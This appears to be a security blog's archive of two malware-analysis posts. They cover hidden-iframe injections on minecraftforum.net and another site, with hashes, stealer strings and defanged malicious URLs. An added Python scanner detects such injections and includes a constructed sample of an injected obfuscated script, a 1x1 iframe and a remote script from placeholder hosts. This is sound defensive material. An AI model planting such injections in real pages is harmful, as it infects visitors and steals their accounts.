Tag Archives: hidden iframe

Hidden Iframe in MineCraftForum.Net

Users have reported to us another website infected with a hidden iframe:

hxxp://www.minecraftforum.net/

All web pages are affected!

Here is an image of the hidden iframe at the bottom of the HTML pages:

Image

When I visited the infected website, NoVirusThanks EXE Radar Pro displayed an alert about an unknown executable that tried to run on the system:

C:\Documents and Settings\User\Local Settings\Temp\scvhost.exe

Note the file name: scvhost.exe is a look-alike of the legitimate Windows svchost.exe, and it was dropped into the user's Temp folder rather than living in System32, both typical of a drive-by payload.

Report date: 2011-06-22 11:34:41 (GMT+1)
File name: scvhost-exe
File size: 18944 bytes
MD5 hash: 5e71723d34d10648ed880af8e564f63b
SHA1 hash: 1af3dcb235e0a16eb58cebdbc0b9fb6316dc2f3b
Detection rate: 0 of 5 (0%)
Status: CLEAN (none of the five engines flagged it at the time of the report)

Thanks to NoVirusThanks EXE Radar Pro, I was able to block and delete the unknown and malicious executable file, preventing the system from being infected.

Some ASCII strings extracted from the PE file:

All strings are ASCII; RVA, file offset and size are hexadecimal, size in bytes.

RVA       Offset    Size      Value
00006CE2  000040E2  0000000D  GuardCore.dll
00006EBC  000042BC  00000024  hxxp://www.dashangu.com/new/getw.asp
00006EFF  000042FF  00000006  server
00006F14  00004314  0000000E  WTF\Config.wtf
00006F24  00004324  0000000A  realmName
00006F35  00004335  00000005  Right
00006F4C  0000434C  00000024  hxxp://www.dashangu.com/new/getr.asp
00006F74  00004374  00000011  JAGEXLAUNCHER.EXE
00006F88  00004388  00000007  WOW.EXn
00006F90  00004390  00000007  WinInet

WTF\Config.wtf and realmName are World of Warcraft client configuration artifacts and JAGEXLAUNCHER.EXE is the RuneScape launcher, so these strings point to a game-account stealer. The two dashangu.com URLs (getw.asp, getr.asp) look like its download and report endpoints, and WinInet is the Windows HTTP library it would use to reach them.

URLVoid domain analysis:

http://www.urlvoid.com/scan/minecraftforum.net

16:38PM UPDATE:

The website now appears to be under maintenance, so it will probably be fixed soon.

Website infected with malicious scripts

I was browsing websites analyzed by our internal honeypots and found a website infected with two malicious scripts. I used a website sniffer to retrieve the content of the site, and in the image below we can see that after the closing html tag there are two JavaScript scripts:

Image

This is very suspicious: there should never be scripts or iframes after the closing html tag, and it looks like the website has been hit by an automated injector that appends specific code (here JS code plus an iframe) to the end of every file on the site. Most probably other websites hosted on the same server have the same dangerous scripts injected into all of their files; this is a common symptom of a mass infection.

We can see that the first script contains obfuscated data and uses random function names to evade heuristic detection by security software. When deobfuscated, it points to the following malicious URL:

Image

Interestingly, it is an iframe that can be called hidden, since it sets the width and height parameters to a very small value (1) so that the frame renders as a single pixel and is invisible to the user. A scan with IPVoid.com reveals that the IP address is detected by 5 engines and classified as dangerous: 79.135.152.181

The other script is not obfuscated, and we can see that it loads a script from a remote website that looks suspicious because it serves from port 8080 rather than a standard web port:

hxxp://oployau.fancountblogger. com:8080/Undo.js

A scan with URLVoid.com reveals that the website is detected by 5 engines and it is classified as dangerous: oployau.fancountblogger.com
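As an added example (not part of the original posts and not the tooling used in them), the following Python script checks web files for the indicators discussed in both posts: content appended after the closing html tag, iframes sized 1x1 or hidden with CSS, scripts pulled from a remote host on a non-standard port, and common JS obfuscation patterns (unescape/fromCharCode/long escape runs). The sample page, the IP 203.0.113.5 and the hostname example.invalid are constructed placeholders, not indicators from the posts.

```python
"""Heuristic scanner for the injection indicators discussed above.

Added example; not the tooling used in the original posts. SAMPLE and the
hosts in it are constructed placeholders.
"""
import re
from dataclasses import dataclass
from html.parser import HTMLParser
from pathlib import Path
from urllib.parse import urlsplit


@dataclass
class Finding:
    kind: str    # trailing-content | hidden-iframe | odd-port-script | obfuscated-script
    detail: str  # snippet or src URL that triggered the finding


CLOSE_HTML = re.compile(r"</html\s*>", re.I)
HIDDEN_CSS = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
# Hallmarks of injected JS: unescape()/fromCharCode decoders, eval, and long
# runs of %xx or \xNN escapes feeding document.write.
OBFUSCATION = re.compile(
    r"unescape\s*\(|fromCharCode|eval\s*\(|(?:%[0-9a-f]{2}){8,}|(?:\\x[0-9a-f]{2}){8,}",
    re.I,
)


def _px(value):
    """Parse width/height attribute values such as '1', '1px' or '0' into an int."""
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else None


def trailing_content(html):
    """Return any non-blank text after the final </html>; a clean page has none."""
    closes = list(CLOSE_HTML.finditer(html))
    return html[closes[-1].end():].strip() if closes else ""


class _Collector(HTMLParser):
    """Collect hidden iframes, odd-port remote scripts and obfuscated inline JS."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._script = None  # text chunks while inside <script>...</script>

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            w, h = _px(a.get("width")), _px(a.get("height"))
            tiny = (w is not None and w <= 1) or (h is not None and h <= 1)
            if tiny or HIDDEN_CSS.search(a.get("style") or ""):
                self.findings.append(Finding("hidden-iframe", a.get("src") or "<no src>"))
        elif tag == "script":
            self._script = []
            src = a.get("src")
            if src:
                u = urlsplit(src)
                # Remote script served from a port other than 80/443 (e.g. :8080).
                if u.netloc and u.port not in (None, 80, 443):
                    self.findings.append(Finding("odd-port-script", src))

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            body, self._script = "".join(self._script), None
            if OBFUSCATION.search(body):
                self.findings.append(Finding("obfuscated-script", body[:60]))


def scan_html(html):
    """Return the list of Findings for one page (empty when nothing is flagged)."""
    findings = []
    tail = trailing_content(html)
    if tail:
        findings.append(Finding("trailing-content", tail[:80]))
    c = _Collector()
    c.feed(html)  # whole document, so injections after </html> are still parsed
    c.close()
    return findings + c.findings


def scan_tree(root, suffixes=(".html", ".htm", ".php", ".tpl")):
    """Walk a web root and return {path: findings}. Hits in most files is the
    mass-infection pattern: an automated injector appending to every file."""
    hits = {}
    for p in Path(root).rglob("*"):
        if p.is_file() and p.suffix.lower() in suffixes:
            found = scan_html(p.read_text(errors="replace"))
            if found:
                hits[str(p)] = found
    return hits


# Constructed sample: a normal page with an injected tail like the ones in the posts.
SAMPLE = """<html><head><title>forum</title></head>
<body><p>welcome</p></body></html>
<script>var q8z1=unescape('%3C%69%66%72%61%6D%65%20');document.write(q8z1);</script>
<iframe src="http://203.0.113.5/in.php" width="1" height="1"></iframe>
<script src="http://example.invalid:8080/Undo.js"></script>
"""

if __name__ == "__main__":
    for f in scan_html(SAMPLE):
        print(f"{f.kind:18} {f.detail}")
```

Run scan_tree over the web root (and over neighbouring sites on a shared host): the same findings in nearly every file is the mass-infection symptom described above. The scanner is a triage aid only; it does not tell you how the injector got write access, which is what has to be fixed before the files are cleaned.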